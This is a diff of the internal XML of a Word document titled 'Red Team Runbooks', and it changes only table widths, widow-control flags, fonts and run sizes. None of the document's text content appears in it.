--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1530"/>
+        <w:gridCol w:w="1529"/>
         <w:gridCol w:w="493"/>
-        <w:gridCol w:w="2289"/>
+        <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1287"/>
+        <w:gridCol w:w="1286"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -50,15 +50,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -78,13 +78,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -111,7 +111,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -131,14 +131,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -163,15 +163,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -191,13 +191,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -224,7 +224,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -244,14 +244,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -276,15 +276,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -304,13 +304,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -337,7 +337,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -357,14 +357,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -389,15 +389,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -417,13 +417,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -450,7 +450,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -470,14 +470,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -502,14 +502,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1530" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -529,7 +529,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -556,7 +556,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -581,15 +581,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -617,7 +617,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -637,14 +637,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -669,14 +669,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -696,14 +696,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -723,7 +723,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -743,7 +743,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -763,13 +763,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -780,8 +780,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -793,15 +793,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -821,7 +821,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -829,7 +829,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -849,14 +849,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -881,14 +881,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -908,14 +908,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -935,7 +935,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -943,7 +943,6 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
@@ -954,7 +953,6 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
-                <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -964,7 +962,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -973,7 +971,6 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
-                <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -983,32 +980,32 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -1019,8 +1016,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -1032,15 +1029,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1060,7 +1057,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1068,7 +1065,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1088,14 +1085,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1120,14 +1117,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1147,14 +1144,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1174,13 +1171,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -1191,8 +1188,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -1204,15 +1201,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1232,7 +1229,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1240,7 +1237,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1260,14 +1257,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
